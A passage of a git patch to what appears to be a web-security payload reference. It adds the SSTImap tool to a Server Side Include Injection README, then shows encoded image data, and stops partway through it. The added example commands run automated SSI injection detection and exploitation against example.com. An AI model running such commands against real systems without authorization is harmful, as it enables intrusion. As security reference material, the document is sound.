From 7fb2ff75d7f299246fda0b14f04b28de741bf799 Mon Sep 17 00:00:00 2001
From: vladko312 <vladko312@gmail.com>
Date: Sat, 3 Jan 2026 05:20:04 +0300
Subject: [PATCH 1/5] SSI: - Added SSTImap to the tools, as it now supports SSI
 detection and exploitation SSTI: - Added description for known detection and
 exploitation techniques - Added payloads for universal detection - Added
 universal payloads for different languages - Added Error-Based and
 Boolean-Based payloads - Moved SpEL payloads using `T()` to the correct
 category - Moved Pug payloads to the correct language and updated info to
 reflect the actual name

---
 Server Side Include Injection/README.md       |  11 ++
 .../Images/technique_Boolean-Based.png        | Bin 0 -> 5386 bytes
 .../Images/technique_Error-Based.png          | Bin 0 -> 6973 bytes
 .../Images/technique_Polyglot-Based.png       | Bin 0 -> 5164 bytes
 .../Images/technique_Rendered.png             | Bin 0 -> 4370 bytes
 .../Images/technique_Time-Based.png           | Bin 0 -> 4744 bytes
 Server Side Template Injection/Java.md        | 124 +++++++++-----
 Server Side Template Injection/JavaScript.md  |  74 +++++++--
 Server Side Template Injection/PHP.md         |  66 ++++++--
 Server Side Template Injection/Python.md      |  44 +++--
 Server Side Template Injection/README.md      | 152 ++++++++++++++++--
 Server Side Template Injection/Ruby.md        |  31 +++-
 12 files changed, 405 insertions(+), 97 deletions(-)
 create mode 100644 Server Side Template Injection/Images/technique_Boolean-Based.png
 create mode 100644 Server Side Template Injection/Images/technique_Error-Based.png
 create mode 100644 Server Side Template Injection/Images/technique_Polyglot-Based.png
 create mode 100644 Server Side Template Injection/Images/technique_Rendered.png
 create mode 100644 Server Side Template Injection/Images/technique_Time-Based.png

diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index 62dcb71a45..5880147ec8 100644
--- a/Server Side Include Injection/README.md	
+++ b/Server Side Include Injection/README.md	
@@ -4,10 +4,21 @@
 
 ## Summary
 
+* [Tools](#tools)
 * [Methodology](#methodology)
 * [Edge Side Inclusion](#edge-side-inclusion)
 * [References](#references)
 
+## Tools
+
+- [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI`
+
+  ```bash
+  python3 ./sstimap.py -u 'https://example.com/page?name=John' --legacy -s
+  python3 ./sstimap.py -i -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e SSI
+  python3 ./sstimap.py -i --legacy -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk'
+  ```
+
 ## Methodology
 
 SSI Injection occurs when an attacker can input Server Side Include directives into a web application. SSIs are directives that can include files, execute commands, or print environment variables/attributes. If user input is not properly sanitized within an SSI context, this input can be used to manipulate server-side behavior and access sensitive information or execute commands.
diff --git a/Server Side Template Injection/Images/technique_Boolean-Based.png b/Server Side Template Injection/Images/technique_Boolean-Based.png
new file mode 100644
index 0000000000000000000000000000000000000000..9081d50c6bb7d43a21ddd6b13a780f89bb677248
GIT binary patch
literal 5386
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
T(M}!M%mj2a4K(mKY@YlJ%vfCY

literal 0
HcmV?d00001

diff --git a/Server Side Template Injection/Images/technique_Error-Based.png b/Server Side Template Injection/Images/technique_Error-Based.png
new file mode 100644
index 0000000000000000000000000000000000000000..ec1f630aebc881d8e454d5bdf39fd673138dd021
GIT binary patch
literal 6973
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
